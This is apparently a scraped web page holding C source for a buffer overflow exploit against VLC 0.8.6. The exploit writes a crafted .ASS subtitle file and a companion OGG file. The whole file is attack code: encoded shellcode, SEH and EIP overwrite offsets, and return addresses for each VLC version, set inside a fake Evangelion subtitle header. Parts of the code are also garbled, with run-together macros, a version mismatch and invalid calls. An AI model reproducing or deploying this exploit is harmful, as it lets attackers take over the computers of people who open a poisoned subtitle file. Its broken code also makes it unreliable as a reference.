扫码分享
验证:
体验盒子/*[%]VLC vs 0.6.8 [b][c][d][a] .ASS file buffer overflow exploit(win32 universal)
[%]Works every time,works on any win32 OS,tested on Windows xp sp2.
[%]My doctor said that I have seriuouse problems ,but I think he's full of it
because the voices tell me I'm ok!*/
#include<stdio.h>
#include<string.h>
#include<stdint.h>
#define File"subtitle666.ass"
#define OGGfile "openme.ogg"
#define IF(x,NULL)if(x==NULL)
#define FOR(i,a,b)for(i=a;i<b;++i)
#define WHILE(z)while(z>0)
#define is_bigendian()((*(char*)&i)==0)
#define EIP_OFFSET163852
#define SEH_OFFSET165248
#define NEXTSEH_OFFSET165244
/*-------------prototypes---------*/
//100% working shellcode
char vlcshellcode[]=
{
"\x31\xc9\x83\xe9\xde\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x3d"
"\xba\xb1\xd9\x83\xeb\xfc\xe2\xf4\xc1\x52\xf5\xd9\x3d\xba\x3a\x9c"
"\x01\x31\xcd\xdc\x45\xbb\x5e\x52\x72\xa2\x3a\x86\x1d\xbb\x5a\x90"
"\xb6\x8e\x3a\xd8\xd3\x8b\x71\x40\x91\x3e\x71\xad\x3a\x7b\x7b\xd4"
"\x3c\x78\x5a\x2d\x06\xee\x95\xdd\x48\x5f\x3a\x86\x19\xbb\x5a\xbf"
"\xb6\xb6\xfa\x52\x62\xa6\xb0\x32\xb6\xa6\x3a\xd8\xd6\x33\xed\xfd"
"\x39\x79\x80\x19\x59\x31\xf1\xe9\xb8\x7a\xc9\xd5\xb6\xfa\xbd\x52"
"\x4d\xa6\x1c\x52\x55\xb2\x5a\xd0\xb6\x3a\x01\xd9\x3d\xba\x3a\xb1"
"\x01\xe5\x80\x2f\x5d\xec\x38\x21\xbe\x7a\xca\x89\x55\xc4\x69\x3b"
"\x4e\xd2\x29\x27\xb7\xb4\xe6\x26\xda\xd9\xd0\xb5\x5e\xba\xb1\xd9"
};
char data[]=
{
"[Script Info]\n"
"; Script generated by Aegisub\n"
"; http://www.aegisub.net\n"
"Title: Neon Genesis Evangelion - Episode 26 (neutral Spanish)\n"
"Original Script: RoRo\n"
"Script Updated By: version 2.8.01\n"
"ScriptType: v4.00+\n"
"Collisions: Normal\n"
"PlayResY: 600\n"
"PlayDepth: 0\n"
"Timer: 100,0000\n"
"Video Aspect Ratio: 0\n"
"Video Zoom: 6\n"
"Video Position: 0\n"
"[V4+ Styles]\n"
"Format: Name, Fontname, Fontsize, PrimaryColour, SecondaryColour, OutlineColour, BackColour, Bold, Italic, Underline, StrikeOut, ScaleX, ScaleY, Spacing, Angle, BorderStyle, Outline, Shadow, Alignment, MarginL, MarginR, MarginV, Encoding\n"
"Style: DefaultVCD, Arial,28,&H00B4FCFC,&H00B4FCFC,&H00000008,&H80000008,-1,0,0,0,100,100,0.00,0.00,1,1.00,2.00,2,30,30,30,0\n"
"[Events]\n"
"Format: Layer, Start, End, Style, Name, MarginL, MarginR, MarginV, Effect, Text\n"
"Dialogue:"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" //165254 junk bytes to cause exception
};
char banner[]=
{
"******************************************************************\n"
" VLC 0.6.8x Buffer overflow exploit(win32 universal)*\n"
" *\n"
"by fl0 fl0w*\n"
"******************************************************************\n"
};
char arguments[]=
{
"---------------------------\n"
"Too few args!\n"
"sploit.exe [target 1/2/3/4]\n"
"---------------------------\n"
};
// data + 165254 nop + shellcode + szJMP(strcat)
/*--------extern variables----------*/
char b[1000000];
char c[1000000];
char d[1000000];
char f[1000000]; //1402 bytes nop
char seh[]="\x87\x75\x40\x4B";
char nseh[]="\x38\xFA\x74\x02";
int i;
int input;
char bf[4];
int t;
/*-------prototypes----------*/
int buildF();
int cpy(unsigned int,char*);
void print(char*);
void gen_random(char*, const int);
unsigned int getFsize(FILE*,char*);
int cpystr(char* dest,int,int);
int oggf(char* fname);
int Targetprint();
/*--------ogg file format---------*/
typedef struct aa
{//28 bytes or 224 bits
uint32_t Cp;// Capture pattern � 32 bits
uint8_tVer;// Version � 8 bits
uint8_tH;// Header type � 8 bits
uint64_t Gp; //Granule position � 64 bits
uint32_t Bsn;// Bitstream serial number � 32 bits
uint32_t Psn;// Page sequence number � 32 bits
uint32_t C;// Checksum � 32 bits
uint8_tPs;// Page segments � 8 bits
uint8_tSt;// Segment table 8 bit
}ogg;
/*------targets------------*/
struct
{
unsigned int eip;
char* etype;
}RET[]=
{
{
0x026DFA38,
"VLC 0.8.6 c"
},
{
0x0263FA38,
"VLC 0.8.6 b,d"
},
{
0x0267FA38,
"VLC 0.8.6 a"
},
{
0x0267FA38,
"VLC 0.8.6 b test1"
},
{
0x02B6FA38,
"VLC 0.8.6 RC1"
},
{
NULL,NULL
}
};
/*------main--------*/
int main(int argc,char* argv[])
{
if(argc<2)
{
system("CLS");
printf("%s%s",banner,arguments);
Targetprint();exit(0);
}
input=atoi(argv[1]);
switch(input)
{
case 0:
reverseInt(RET[0].eip);
cpy(RET[0].eip,bf);
break;
case 1:
reverseInt(RET[1].eip);
cpy(RET[1].eip,bf);
break;
case 2:
reverseInt(RET[2].eip);
cpy(RET[2].eip,bf);
break;
case 3:
reverseInt(RET[3].eip);
cpy(RET[3].eip,bf);
break;
case 4:
reverseInt(RET[4].eip);
cpy(RET[4].eip,bf);
break;
}
printf("[!]Using : %s retaddress\n",RET[input].etype);
buildF(b); oggf(OGGfile); getchar();
return 0;
}
int buildF(unsigned int retn)
{
FILE *f=fopen(File,"wb");
IF(f,NULL)
{
print("File .ass error!"); exit(0);}
gen_random(b,165267); /*EIP offset 165267 bytes [EIP][NOP nopoffset=164667 bytes][SHELLCODE nopoffset+nrbytes nop]*/
memcpy(b+EIP_OFFSET,bf,4);
memset(b+EIP_OFFSET+4,0x90,10);
memcpy(b+EIP_OFFSET+4+10,vlcshellcode,strlen(vlcshellcode));
fprintf(f,"%s%s",data,b);
free(data); fclose(f);
printf("[#]ASS file DONE!\n",getFsize(f,File));
return 0;
}
int oggf(char* fname)
{
FILE* g=fopen(fname,"wb");
IF(g,NULL)
{
print("File ogg error");
exit(0);
}
ogg *W666;
W666=(ogg*)malloc(sizeof(ogg));
W666->Cp=0x5367674F;
W666->Ver=0x00;
W666->H=0x02;
W666->Gp=0x00000000;
W666->Bsn=0x000060B8;
W666->Psn=0x00000000;
W666->C=0xA403D2F8;
W666->Ps=0x01;
W666->St=0x1E;
fwrite(W666,sizeof(W666),9,g);
fclose(g);
printf("[#]OGG file DONE!\n",getFsize(g,OGGfile));
return 0;
}
int cpy(unsigned int source,char* dest)
{
int len;
len=4;
memcpy(dest,&source,len+1);
return len;
}
void print(char* msg)
{
printf("[*]%s\n",msg);
}
void gen_random(char *s, const int len)
{
static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
FOR(i,0,len)
{
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
}
s[len]=0;
}
unsigned int getFsize(FILE* g,char* gname)
{
unsigned int s;
g=fopen(gname,"rb");
IF(g,NULL)
{
print("File error at reading");
exit(0);
}
fseek(g,0,SEEK_END);
s=ftell(g);
return s;
}
int reverseInt(unsigned int i)
{
unsigned char c1, c2, c3, c4;
if(is_bigendian())
{
return i;
}else
{
c1=i&255;
c2=(i>>8)&255;
c3=(i>>16)&255;
c4=(i>>24)&255;
return((int)c1<<24)+((int)c2<<16)+((int)c3<<8)+c4;
}
}
int cpystr(char* dest,int str,int len)
{
memset(dest,str,len+1);
return len;
}
int Targetprint()
{
print("Targets are:");
for(t=0;t<5;t++)
printf("[!]%s - [0x%d] - %d\n",RET[t].etype,RET[t].eip,t);
}
体验盒子
